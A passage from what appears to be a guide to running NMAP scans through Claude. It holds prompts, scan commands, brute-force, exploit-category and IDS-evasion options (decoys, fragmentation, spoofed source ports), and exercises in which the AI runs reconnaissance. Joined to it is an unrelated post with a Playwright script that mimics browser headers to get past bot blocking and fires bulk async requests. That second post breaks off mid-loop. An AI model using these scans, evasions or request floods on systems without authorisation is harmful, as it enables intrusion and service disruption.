Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

9. SMB Vulnerability Scanning (EternalBlue)

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

13. FTP Anonymous Access and Vulnerabilities

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

14. Mail Server Security Assessment

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: Probes XML-handling web endpoints. Note that stock NMAP ships no dedicated XXE script; the closest bundled check, http-vuln-cve2017-5638, actually targets the Apache Struts OGNL injection flaw, so thorough XXE testing usually requires manual tooling such as Burp Suite.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check. Note that the bundled rdp-vuln-ms12-020 script checks the older MS12-020 flaw; BlueKeep (CVE-2019-0708) detection requires a third-party NSE script or a dedicated scanner.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection (known backdoored builds)
nmap --script ftp-vsftpd-backdoor,irc-unrealircd-backdoor -T4 secure-server.example-target.com

# Phase 5: Authentication Testing (auth and brute script categories)
nmap --script auth,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.
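The common-pattern portion of this exercise can be sketched in a few lines of Python. The pattern list and domain below are illustrative, and actually resolving candidates requires network access:

```python
import socket

# Common subdomain patterns from the prompt; extend as needed (illustrative)
COMMON_PATTERNS = ["www", "api", "dev", "staging", "admin", "mail", "vpn", "test"]

def candidate_subdomains(domain, patterns=COMMON_PATTERNS):
    """Build fully qualified candidate names to try resolving."""
    return [f"{p}.{domain}" for p in patterns]

def resolves(host):
    """True if the hostname currently resolves (requires network access)."""
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False

print(candidate_subdomains("example-target.com")[:2])
# -> ['www.example-target.com', 'api.example-target.com']
```

Feed the names that resolve into targeted NMAP service scans, and note any candidate whose IP sits outside the organization's known ranges.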

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Note: -oA writes the normal, XML, and grepable formats; the script kiddie format requires a separate -oS <file> flag.

Claude can then help you parse the XML file programmatically.
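As a sketch of that parsing step, the function below walks NMAP's XML output and lists open ports with their detected services. The embedded SAMPLE document is a minimal hand-written stand-in for the real scan_results.xml:

```python
import xml.etree.ElementTree as ET

def open_ports(xml_text):
    """Return (host, port, service, product) tuples for open ports."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # skip closed/filtered ports
            svc = port.find("service")
            findings.append((
                addr,
                int(port.get("portid")),
                svc.get("name", "?") if svc is not None else "?",
                svc.get("product", "") if svc is not None else "",
            ))
    return findings

# Minimal stand-in for nmap -oX output (illustrative, not a real scan)
SAMPLE = """<nmaprun><host><address addr="198.51.100.10" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="22"><state state="open"/>
<service name="ssh" product="OpenSSH"/></port>
<port protocol="tcp" portid="23"><state state="closed"/></port>
</ports></host></nmaprun>"""

print(open_ports(SAMPLE))
# -> [('198.51.100.10', 22, 'ssh', 'OpenSSH')]
```

With real output, replace SAMPLE with `open("scan_results.xml").read()` and filter the tuples down to whatever your report needs.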

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.
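The categorization in step 1 follows the standard CVSS v3 severity bands, which is easy to sketch; the findings list below is invented purely for illustration:

```python
def severity(cvss):
    """Map a CVSS v3 base score to its standard severity rating."""
    if cvss == 0.0:
        return "Info"      # CVSS "None"
    if cvss < 4.0:
        return "Low"       # 0.1 - 3.9
    if cvss < 7.0:
        return "Medium"    # 4.0 - 6.9
    if cvss < 9.0:
        return "High"      # 7.0 - 8.9
    return "Critical"      # 9.0 - 10.0

# Illustrative findings, not real scan output
findings = [("MS17-010 EternalBlue", 9.8),
            ("TLS 1.0 enabled", 6.5),
            ("Banner disclosure", 0.0)]
for name, score in findings:
    print(f"{severity(score):8} {score:>4}  {name}")
```

Sorting the list by score descending then gives a first-pass remediation order before business impact is factored in.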

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
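
Once each weekly scan is parsed, change detection boils down to a dictionary diff. A minimal sketch, with invented data standing in for two parsed scans:

```python
def diff_scans(baseline, current):
    """Compare {host: {port: service_version}} maps and return alert strings."""
    alerts = []
    for host, ports in current.items():
        if host not in baseline:
            alerts.append(f"NEW HOST {host}")
            continue
        for port, svc in ports.items():
            if port not in baseline[host]:
                alerts.append(f"NEW PORT {host}:{port} ({svc})")
            elif baseline[host][port] != svc:
                alerts.append(f"VERSION CHANGE {host}:{port} {baseline[host][port]} -> {svc}")
    return alerts

# Illustrative scan data, not real results
base = {"198.51.100.10": {22: "OpenSSH 8.9"}}
new  = {"198.51.100.10": {22: "OpenSSH 9.6", 80: "nginx"},
        "198.51.100.11": {443: "nginx"}}
for alert in diff_scans(base, new):
    print(alert)
```

A cron job can run the weekly scan, build the maps from the XML output, and mail the alert list whenever it is non-empty.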

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
  const b = path.basename(process.argv[1]);
  console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
  -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, PATCH) [default: GET]
  -d, --data DATA            Request body
  -H, --header HEADER        Add custom header (repeatable)
  -o, --output FILE          Write response body to file
  -c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
  -A, --user-agent UA        Custom User-Agent
  -t, --timeout SECONDS      Request timeout [default: 30]
      --async                Run request(s) in background
      --count N              Number of async requests to fire [default: 1, requires --async]
      --no-redirect          Do not follow redirects (best-effort)
      --show-headers         Print response headers
      --json                 Send data as JSON (sets Content-Type)
      --form                 Send data as application/x-www-form-urlencoded
  -v, --verbose              Verbose output
  -h, --help                 Show this help message
EXAMPLES:
  ${b} https://example.com
  ${b} --async https://example.com
  ${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
  ${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
  const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
  for (let i = 0; i < argv.length; i++) {
    const a = argv[i];
    switch (a) {
      case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
      case '-d': case '--data': args.data = String(argv[++i] || ''); break;
      case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
      case '-o': case '--output': args.output = String(argv[++i] || ''); break;
      case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
      case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
      case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
      case '--async': args.async = true; break;
      case '--count': args.count = Number(argv[++i] || '1'); break;
      case '--no-redirect': args.followRedirects = false; break;
      case '--show-headers': args.showHeaders = true; break;
      case '--json': args.contentType = 'application/json'; break;
      case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
      case '-v': case '--verbose': args.verbose = true; break;
      case '-h': case '--help': usage(); process.exit(0);
      default:
        if (!args.url && !a.startsWith('-')) args.url = a; else {
          console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
          process.exit(1);
        }
    }
  }
  return args;
}
function parseHeaderList(list) {
  const out = {};
  for (const h of list) {
    const idx = h.indexOf(':');
    if (idx === -1) continue;
    const name = h.slice(0, idx).trim();
    const value = h.slice(idx + 1).trim();
    if (!name) continue;
    out[name] = value;
  }
  return out;
}
function buildDefaultHeaders(userAgent) {
  const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
  return {
    'User-Agent': ua,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-User': '?1',
    'Cache-Control': 'max-age=0'
  };
}
async function performRequest(opts) {
  // Cookie file handling
  const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
  const cookieFile = opts.cookieFile || defaultCookie;
  // Launch Chromium
  const browser = await chromium.launch({ headless: true });
  const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
  if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
  const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
  // Load cookies if present
  if (fs.existsSync(cookieFile)) {
    try {
      const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
      if (ss.cookies?.length) await context.addCookies(ss.cookies);
    } catch {}
  }
  const request = context.request;
  // Build request options
  const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
  if (opts.data) {
    // Body is sent verbatim; the Content-Type header (set via --json/--form
    // or -H) tells the server how to interpret it
    reqOpts.data = opts.data;
  }
  if (opts.followRedirects === false) {
    // Best-effort: limit redirects to 0
    reqOpts.maxRedirects = 0;
  }
  const method = opts.method.toUpperCase();
  let resp;
  try {
    if (method === 'GET') resp = await request.get(opts.url, reqOpts);
    else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
    else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
    else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
    else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
    else {
      console.error(`${RED}Unsupported method: ${method}${NC}`);
      await browser.close();
      process.exit(2);
    }
  } catch (e) {
    console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
    await browser.close();
    process.exit(3);
  }
  // Persist cookies
  try {
    const state = await context.storageState();
    fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
  } catch {}
  // Output
  const status = resp.status();
  const statusText = resp.statusText();
  const headers = await resp.headers();
  const body = await resp.text();
  if (opts.verbose) {
    console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
    console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
  }
  if (opts.showHeaders) {
    // Print a simple status line and headers to stdout before body
    console.log(`HTTP ${status} ${statusText}`);
    for (const [k, v] of Object.entries(headers)) {
      console.log(`${k}: ${v}`);
    }
    console.log('');
  }
  if (opts.output) {
    fs.writeFileSync(opts.output, body);
  } else {
    process.stdout.write(body);
  }
  if (!resp.ok()) {
    console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
    await browser.close();
    process.exit(4);
  }
  await browser.close();
}
async function main() {
  const argv = process.argv.slice(2);
  const opts = parseArgs(argv);
  if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
  if ((opts.count || 1) > 1 && !opts.async) {
    console.error(`${RED}Error: --count requires --async${NC}`);
    process.exit(1);
  }
  if (opts.count < 1 || !Number.isInteger(opts.count)) {
    console.error(`${RED}Error: --count must be a positive integer${NC}`);
    process.exit(1);
  }
  if (opts.async) {
    // Fire-and-forget background processes
    // Strip --async plus --count and its value so each child runs one synchronous request
    const raw = process.argv.slice(2);
    const baseArgs = [];
    for (let i = 0; i < raw.length; i++) {
      if (raw[i] === '--async') continue;
      if (raw[i] === '--count') { i++; continue; }
      baseArgs.push(raw[i]);
    }
    const pids = [];
    for (let i = 0; i < opts.count; i++) {
      const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
      pids.push(child.pid);
      child.unref();
    }
    if (opts.verbose) {
      console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
    }
    if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
    else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
    process.exit(0);
  }
  await performRequest(opts);
}
main().catch(err => {
  console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
  process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, put it on your PATH. Note that Node resolves the playwright package from the script's real location, so symlink it (which preserves module resolution) rather than moving it out of the project directory:

sudo ln -s "$PWD/browser_playwright.mjs" /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
  -d "username=user&password=pass" \
  https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
  https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
